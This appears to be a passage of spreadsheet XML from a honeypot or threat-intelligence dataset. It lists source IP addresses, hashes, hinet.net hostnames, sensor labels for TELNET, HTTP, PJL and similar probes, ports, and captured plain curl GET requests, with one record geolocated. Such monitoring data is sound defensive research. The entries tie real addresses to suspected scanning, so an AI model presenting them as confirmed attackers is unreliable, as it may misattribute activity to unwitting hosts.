    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_VNC_H1&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_NTP_H33&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;123&amp;&amp;29239&amp;&amp;56390&amp;&amp;56408&amp;&amp;12243&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:13d2</t>
  </si>
  <si>
    <t>738ee65626105de7cbc0d78ab20240b7</t>
  </si>
  <si>
    <t>59.182.113.138</t>
  </si>
  <si>
    <t>::ffff:3bb6:718a</t>
  </si>
  <si>
    <t>934e06cabb5eba7c54c6592c8bec37e4</t>
  </si>
  <si>
    <t>114.33.108.83</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-108-83.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;42689&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA&amp;&amp;51196</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:6c53</t>
  </si>
  <si>
    <t>45fbf5b942254bfba032dc49f91fd103</t>
  </si>
  <si>
    <t>220.132.17.202</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-17-202.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>23&amp;&amp;30115&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc84:11ca</t>
  </si>
  <si>
    <t>33c01f567305fc96d314353f99c14471</t>
  </si>
  <si>
    <t>125.229.14.67</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-14-67.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;31072&amp;&amp;23&amp;&amp;5937&amp;&amp;48762&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de5:e43</t>
  </si>
  <si>
    <t>7e122c63f37428085af39bcc3646b2a4</t>
  </si>
  <si>
    <t>120.61.94.115</t>
  </si>
  <si>
    <t>::ffff:783d:5e73</t>
  </si>
  <si>
    <t>d121dc9ab36d7f9eaf6b56c38508401a</t>
  </si>
  <si>
    <t>152.59.221.77</t>
  </si>
  <si>
    <t>Injambakkam</t>
  </si>
  <si>
    <t>9212569</t>
  </si>
  <si>
    <t>12.9162</t>
  </si>
  <si>
    <t>80.2488</t>
  </si>
  <si>
    <t>::ffff:983b:dd4d</t>
  </si>
  <si>
    <t>613b472fbdeaefd963b8fc2c1d45e72f</t>
  </si>
  <si>
    <t>117.209.87.171</t>
  </si>
  <si>
    <t>::ffff:75d1:57ab</t>
  </si>
  <si>
    <t>094552d1db3e165327627341c56f0fc9</t>
  </si>
  <si>
    <t>59.126.217.3</t>
  </si>
  <si>
    <t>59-126-217-3.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;6907&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7e:d903</t>
  </si>
  <si>
    <t>668c1fa1671f0cf35635b5584ac7246b</t>
  </si>
  <si>
    <t>122.117.38.20</t>
  </si>
  <si>
    <t>122-117-38-20.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;8752&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:2614</t>
  </si>
  <si>
    <t>c86c39c5af6cba5839d175a4b6c007f5</t>
  </si>
  <si>
    <t>125.229.237.151</t>
  </si>
  <si>
    <t>125-229-237-151.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_DNS_H18&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;6226&amp;&amp;23&amp;&amp;53043&amp;&amp;56895&amp;&amp;NA&amp;&amp;9100&amp;&amp;4598</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:ed97</t>
  </si>
  <si>
    <t>c6460b81636219a072620af7c2f3fed4</t>
  </si>
  <si>
    <t>220.134.253.147</t>
  </si>
  <si>
    <t>220-134-253-147.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;30660&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:fd93</t>
  </si>
  <si>
    <t>ce650c41a07bb4ab3da5097c32b7564e</t>
  </si>
  <si>
    <t>125.229.210.141</t>
  </si>
  <si>
    <t>125-229-210-141.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;9100&amp;&amp;22&amp;&amp;62727&amp;&amp;23&amp;&amp;48788&amp;&amp;5978&amp;&amp;43484&amp;&amp;80&amp;&amp;39219</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:d28d</t>
  </si>
  <si>
    <t>80928d80b06b20a65c41f984de4fcc13</t>
  </si>
  <si>
    <t>220.133.67.211</t>
  </si>
  <si>
    <t>220-133-67-211.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>23&amp;&amp;45035&amp;&amp;45046&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:43d3</t>
  </si>
  <si>
    <t>e28e73c98e9013f19568793710e480ad</t>
  </si>
  <si>
    <t>59.126.114.190</t>
  </si>
  <si>
    <t>59-126-114-190.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>80&amp;&amp;30891&amp;&amp;23&amp;&amp;9100&amp;&amp;56910&amp;&amp;29973&amp;&amp;56925&amp;&amp;56941&amp;&amp;52624&amp;&amp;52596&amp;&amp;52671</t>
  </si>
  <si>
    <t>::ffff:3b7e:72be</t>
  </si>
  <si>
    <t>bf398b2448a4105bedc603e722ad238a</t>
  </si>
  <si>
    <t>118.170.200.52</t>
  </si>
  <si>
    <t>118-170-200-52.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>::ffff:76aa:c834</t>
  </si>
  <si>
    <t>c8914a3aed758a1d9f5d8bdaab3be445</t>
  </si>
  <si>
    <t>117.219.76.108</t>
  </si>
  <si>
    <t>::ffff:75db:4c6c</t>
  </si>
  <si>
    <t>9f1ec7e805933045bd172ffecd125e70</t>
  </si>
  <si>
    <t>125.228.157.93</t>
  </si>
  <si>
    <t>125-228-157-93.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_HTTP_H45&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5900&amp;&amp;80&amp;&amp;53&amp;&amp;443&amp;&amp;1080&amp;&amp;9100&amp;&amp;389&amp;&amp;49942&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:7de4:9d5d</t>
  </si>
  <si>
    <t>99ac71f59c5e25f405285af8f52611e5</t>
  </si>
  <si>
    <t>114.33.143.13</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-143-13.hinet-ip.hinet.net</t>
  </si>
  <si>
